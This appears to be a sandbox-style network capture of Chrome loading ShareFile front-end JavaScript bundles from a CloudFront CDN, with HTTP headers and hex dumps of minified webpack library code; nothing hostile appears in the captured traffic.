                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 55384
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 19:10:30 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:21 GMT
                                                                                                                                                                                                                      ETag: "d7fa53958e5ba828febe01a45075469e"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 697a26790d3ab8292d8546ca9be87bbc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: ADlO4L4VZQ1zjwcxULpRfxTU9UhiXR3ladEidPnjOdFbjJcap3gFxw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 76 69 65 77 61 70 70 72 6f 76 61 6c 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevreviewapprovalpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var r={},n={},a={},o={},i={},c={};return Object.defineProperty(o,"__esModule"
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 61 3a 72 5b 34 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 6c 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 6c 3a 72 5b 33 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 6c 61 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 6c 3a 72 5b 33 5d 2c 61 3a 72 5b 34 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 76 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 76 3a 72 5b 33 5d 7d 3b 69 66 28 72 3d 73 2e 68 73 76 61 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 68 3a 72 5b 31 5d 2c 73 3a 72 5b 32 5d 2c 76 3a 72 5b 33 5d 2c 61 3a 72 5b 34 5d 7d 3b 69 66 28 72 3d 73 2e 68 65 78 38 2e 65 78 65 63 28 65 29 2c 72 29 72 65 74 75 72 6e 7b 72 3a
                                                                                                                                                                                                                      Data Ascii: a:r[4]};if(r=s.hsl.exec(e),r)return{h:r[1],s:r[2],l:r[3]};if(r=s.hsla.exec(e),r)return{h:r[1],s:r[2],l:r[3],a:r[4]};if(r=s.hsv.exec(e),r)return{h:r[1],s:r[2],v:r[3]};if(r=s.hsva.exec(e),r)return{h:r[1],s:r[2],v:r[3],a:r[4]};if(r=s.hex8.exec(e),r)return{r:
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 7d 72 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 6e 7d 29 7d 2c 34 35 35 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 6d 36 3a 28 29 3d 3e 68 2c 42 44 3a 28 29 3d 3e 76 7d 29 3b 76 61 72 20 6e 3d 72 28 39 33 37 39 29 2c 61 3d 72 28 39 39 38 29 3b 76 61 72 20 6f 3d 22 64 61 74 61 2d 72 63 2d 6f 72 64 65 72 22 2c 69 3d 22 64 61 74 61 2d 72 63 2d 70 72 69 6f 72 69 74 79 22 2c 63 3d 22 72 63 2d 75 74 69 6c 2d 6b 65 79 22 2c 66 3d 6e 65 77 20 4d 61 70 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 76 61 72 20 65 3d 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                      Data Ascii: nt.createElement)}r.d(t,{A:()=>n})},4552:(e,t,r)=>{"use strict";r.d(t,{m6:()=>h,BD:()=>v});var n=r(9379),a=r(998);var o="data-rc-order",i="data-rc-priority",c="rc-util-key",f=new Map;function u(){var e=(arguments.length>0&&void 0!==arguments[0]?arguments[
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC6232INData Raw: 28 72 2e 6d 65 74 68 6f 64 3d 22 6e 65 78 74 22 2c 72 2e 61 72 67 3d 65 29 2c 72 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 79 29 3a 69 3a 28 72 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 72 2e 61 72 67 3d 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 69 74 65 72 61 74 6f 72 20 72 65 73 75 6c 74 20 69 73 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 22 29 2c 72 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 79 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 76 61 72 20 74 3d 7b 74 72 79 4c 6f 63 3a 65 5b 30 5d 7d 3b 31 20 69 6e 20 65 26 26 28 74 2e 63 61 74 63 68 4c 6f 63 3d 65 5b 31 5d 29 2c 32 20 69 6e 20 65 26 26 28 74 2e 66 69 6e 61 6c 6c 79 4c 6f 63 3d 65 5b 32 5d 2c 74 2e 61 66 74 65 72 4c 6f 63 3d 65 5b 33 5d 29 2c 74 68 69 73 2e 74 72 79 45 6e 74
                                                                                                                                                                                                                      Data Ascii: (r.method="next",r.arg=e),r.delegate=null,y):i:(r.method="throw",r.arg=new TypeError("iterator result is not an object"),r.delegate=null,y)}function _(e){var t={tryLoc:e[0]};1 in e&&(t.catchLoc=e[1]),2 in e&&(t.finallyLoc=e[2],t.afterLoc=e[3]),this.tryEnt


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      110192.168.2.174983213.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC577OUTGET /sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:10:50 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4445c4223f8c2460ef5d29a08d1cc6ac.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 7JQ-A-tUGm_bNToKrUnjoYXIAy27BtnpOyiUG1U1o1weuIOjCR7S_Q==
                                                                                                                                                                                                                      Age: 31257
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      111192.168.2.174983013.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC609OUTGET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC595INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 133363
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 04 Nov 2024 07:10:45 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 08:24:41 GMT
                                                                                                                                                                                                                      ETag: "13dc49e47065015d15ef3bafe1f88202"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 b619a16f6f8fe9793bf642d2a8434284.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: gBXBOZF7wDtWIdXl-FnBC42NjZ-LqQ5ucjI9YD8omdy35BbEjh6Mng==
                                                                                                                                                                                                                      Age: 40300
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 79 6e 61 6d 69 63 66 6f 72 6d 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineP
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC10463INData Raw: 53 68 72 69 6e 6b 3a 31 2c 66 6c 65 78 4e 65 67 61 74 69 76 65 3a 31 2c 66 6c 65 78 4f 72 64 65 72 3a 31 2c 67 72 69 64 52 6f 77 3a 31 2c 67 72 69 64 52 6f 77 45 6e 64 3a 31 2c 67 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 67 72 69 64 52 6f 77 53 74 61 72 74 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 45 6e 64 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 74 61 72 74 3a 31 2c 6d 73 47 72 69 64 52 6f 77 3a 31 2c 6d 73 47 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 66 6f 6e 74 57 65 69 67 68 74 3a 31 2c 6c 69 6e 65 48 65 69 67 68 74 3a 31 2c 6f 70 61 63 69 74 79 3a 31 2c 6f 72 64 65 72
                                                                                                                                                                                                                      Data Ascii: Shrink:1,flexNegative:1,flexOrder:1,gridRow:1,gridRowEnd:1,gridRowSpan:1,gridRowStart:1,gridColumn:1,gridColumnEnd:1,gridColumnSpan:1,gridColumnStart:1,msGridRow:1,msGridRowSpan:1,msGridColumn:1,msGridColumnSpan:1,fontWeight:1,lineHeight:1,opacity:1,order
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 6d 61 72 79 43 6f 6e 74 61 69 6e 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 59 6b 2c 73 65 63 6f 6e 64 61 72 79 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 4d 46 2e 67 72 65 79 39 30 30 2c 73 65 63 6f 6e 64 61 72 79 43 6f 6e 74 61 69 6e 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 59 6b 2c 61 63 74 69 76 65 54 61 62 3a 63 2e 24 53 2c 61 63 63 65 6e 74 43 6f 6c 6f 72 3a 63 2e 24 53 7d 2c 68 3d 7b 70 72 69 6d 61 72 79 3a 75 2e 74 4f 2c 61 63 74 69 76 65 54 61 62 3a 75 2e 62 41 2c 61 63 74 69 6f 6e 3a 75 2e 62 41 2c 61 63 74 69 6f 6e 48 6f 76 65 72 3a 75 2e 79 37 2c 73 65 63 6f 6e 64 61 72 79 41 63 74 69 6f 6e 49 63 6f 6e 3a 75 2e 58 4b 2c 66 6f 63 75 73 3a 75 2e 69 35 2c 69 6e 70 75 74 42 6f 72 64 65 72 3a 75 2e 70 76 2c 69 6e 70 75 74 42 61 63 6b 67
                                                                                                                                                                                                                      Data Ascii: maryContainerBackground:c.Yk,secondaryAppBackground:s.MF.grey900,secondaryContainerBackground:c.Yk,activeTab:c.$S,accentColor:c.$S},h={primary:u.tO,activeTab:u.bA,action:u.bA,actionHover:u.y7,secondaryActionIcon:u.XK,focus:u.i5,inputBorder:u.pv,inputBackg
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 2c 28 72 3d 3e 28 30 2c 6e 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 76 61 72 20 6e 2c 61 2c 73 3b 63 6f 6e 73 74 20 75 3d 74 2e 66 69 6e 64 45 6e 74 69 74 79 54 79 70 65 28 63 2e 70 72 6f 6a 65 63 74 29 2c 6c 3d 5b 5d 2c 64 3d 5b 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 61 20 6f 66 20 72 29 7b 63 6f 6e 73 74 20 72 3d 6f 2e 49 74 65 6d 73 45 6e 74 69 74 79 2e 67 65 74 28 61 2e 73 68 61 72 65 46 69 6c 65 49 64 29 2e 67 65 74 55 72 6c 28 29 2c 73 3d 79 69 65 6c 64 20 6f 2e 49 74 65 6d 73 45 6e 74 69 74 79 2e 67 65 74 28 72 29 2e 65 78 65 63 75 74 65 28 29 2c 66 3d 79 69 65 6c 64 20 65 2e 75 70 6c 6f 61 64 46 69 6c 65 43 6f 6d 70 6c 65 74 65 28 75 2e 65 6e 74 69 74 79 49 64
                                                                                                                                                                                                                      Data Ascii: ,(r=>(0,n.__awaiter)(this,void 0,void 0,(function*(){var n,a,s;const u=t.findEntityType(c.project),l=[],d=[];for(const a of r){const r=o.ItemsEntity.get(a.shareFileId).getUrl(),s=yield o.ItemsEntity.get(r).execute(),f=yield e.uploadFileComplete(u.entityId
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC76INData Raw: 2d 75 72 6c 65 6e 63 6f 64 65 64 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2c 21 31 29 2c 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6c 65 74 20 69 3b 69 66 28 6f 29 7b 69 66 28 72 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63
                                                                                                                                                                                                                      Data Ascii: -urlencoded;charset=utf-8",!1),e.toString();let i;if(o){if(r.indexOf("applic
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 3e 2d 31 29 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 63 65 28 65 2c 6e 65 77 20 53 65 2e 63 6c 61 73 73 65 73 2e 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 76 69 73 69 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 53 65 2e 69 73 4e 6f 64 65 26 26 51 2e 69 73 42 75 66 66 65 72 28 65 29 3f 28 74 68 69 73 2e 61 70 70 65 6e 64 28 74 2c 65 2e 74 6f 53 74 72 69 6e 67 28 22 62 61 73 65 36 34 22 29 29 2c 21 31 29 3a 6e 2e 64 65 66 61 75 6c 74 56 69 73 69 74 6f 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 74 29 29
                                                                                                                                                                                                                      Data Ascii: ation/x-www-form-urlencoded")>-1)return function(e,t){return ce(e,new Se.classes.URLSearchParams,Object.assign({visitor:function(e,t,r,n){return Se.isNode&&Q.isBuffer(e)?(this.append(t,e.toString("base64")),!1):n.defaultVisitor.apply(this,arguments)}},t))
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 65 20 69 73 20 6e 6f 20 73 75 69 74 61 62 6c 65 20 61 64 61 70 74 65 72 20 74 6f 20 64 69 73 70 61 74 63 68 20 74 68 65 20 72 65 71 75 65 73 74 20 22 2b 72 2c 22 45 52 52 5f 4e 4f 54 5f 53 55 50 50 4f 52 54 22 29 7d 72 65 74 75 72 6e 20 6e 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 69 66 28 65 2e 63 61 6e 63 65 6c 54 6f 6b 65 6e 26 26 65 2e 63 61 6e 63 65 6c 54 6f 6b 65 6e 2e 74 68 72 6f 77 49 66 52 65 71 75 65 73 74 65 64 28 29 2c 65 2e 73 69 67 6e 61 6c 26 26 65 2e 73 69 67 6e 61 6c 2e 61 62 6f 72 74 65 64 29 74 68 72 6f 77 20 6e 65 77 20 4e 65 28 6e 75 6c 6c 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 68 74 28 65 29 2c 65 2e 68 65 61 64 65 72 73 3d 50 65 2e 66 72 6f 6d 28 65 2e 68 65 61 64 65 72 73 29 2c 65 2e 64 61 74 61 3d 42 65
                                                                                                                                                                                                                      Data Ascii: e is no suitable adapter to dispatch the request "+r,"ERR_NOT_SUPPORT")}return n};function ht(e){if(e.cancelToken&&e.cancelToken.throwIfRequested(),e.signal&&e.signal.aborted)throw new Ne(null,e)}function mt(e){ht(e),e.headers=Pe.from(e.headers),e.data=Be
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC14929INData Raw: 72 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 72 2e 70 72 65 76 3d 72 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 72 2e 70 72 65 76 3d 30 2c 72 2e 6e 65 78 74 3d 33 2c 52 74 2e 70 75 74 28 22 2f 22 2e 63 6f 6e 63 61 74 28 73 2e 78 57 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 73 63 68 65 6d 61 22 29 2c 74 29 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 6e 3d 72 2e 73 65 6e 74 2c 72 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6e 29 3b 63 61 73 65 20 37 3a 74 68 72 6f 77 20 72 2e 70 72 65 76 3d 37 2c 72 2e 74 30 3d 72 5b 22 63 61 74 63 68 22 5d 28 30 29 2c 6e 65 77 20 45 72 72 6f 72 28 22 45 72 72 6f 72 20 75 70 64 61 74 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 71 75 65 73 74 3a 20 22 2e 63 6f 6e 63 61 74
                                                                                                                                                                                                                      Data Ascii: r){for(;;)switch(r.prev=r.next){case 0:return r.prev=0,r.next=3,Rt.put("/".concat(s.xW,"/").concat(e,"/schema"),t);case 3:return n=r.sent,r.abrupt("return",n);case 7:throw r.prev=7,r.t0=r["catch"](0),new Error("Error updating information request: ".concat
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC16384INData Raw: 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 74 2e 73 74 6f 70 28 29 7d 7d 29 2c 72 29 7d 29 29 29 7d 2c 63 72 65 61 74 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 52 65 71 75 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 46 75 6e 63 74 69 6f 6e 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 2e 22 29 7d 2c 75 70 64 61 74 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 52 65 71 75 65 73 74 53 63 68 65 6d 61 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 4e 74 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 72 65 74 75 72 6e 20 4e 74 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                      Data Ascii: :case"end":return t.stop()}}),r)})))},createInformationRequest:function(){throw new Error("Function not implemented.")},updateInformationRequestSchema:function(e,t){return(0,a.__awaiter)(this,void 0,void 0,Nt().mark((function n(){return Nt().wrap((functio
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC9591INData Raw: 65 22 72 65 74 75 72 6e 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 26 26 6e 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6e 2e 61 72 67 29 3b 6f 3d 68 3b 76 61 72 20 75 3d 64 28 74 2c 72 2c 6e 29 3b 69 66 28 22 6e 6f 72 6d 61 6c 22 3d 3d 3d 75 2e 74 79 70 65 29 7b 69 66 28 6f 3d 6e 2e 64 6f 6e 65 3f 6d 3a 70 2c 75 2e 61 72 67 3d 3d 3d 79 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 75 2e 61 72 67 2c 64 6f 6e 65 3a 6e 2e 64 6f 6e 65 7d 7d 22 74 68 72 6f 77 22 3d 3d 3d 75 2e 74 79 70 65 26 26 28 6f 3d 6d 2c 6e 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 6e 2e 61 72 67 3d 75 2e 61 72 67 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 72 29 7b 76 61 72 20 6e 3d 72 2e 6d 65 74 68 6f 64 2c 6f 3d 74 2e 69 74 65 72 61 74 6f 72 5b 6e
                                                                                                                                                                                                                      Data Ascii: e"return"===n.method&&n.abrupt("return",n.arg);o=h;var u=d(t,r,n);if("normal"===u.type){if(o=n.done?m:p,u.arg===y)continue;return{value:u.arg,done:n.done}}"throw"===u.type&&(o=m,n.method="throw",n.arg=u.arg)}}}function A(t,r){var n=r.method,o=t.iterator[n


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      112192.168.2.174983113.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC423OUTGET /sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 355264
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:10:50 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:20 GMT
                                                                                                                                                                                                                      ETag: "cd405d48fdfd34cb6be76832783f37fc"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
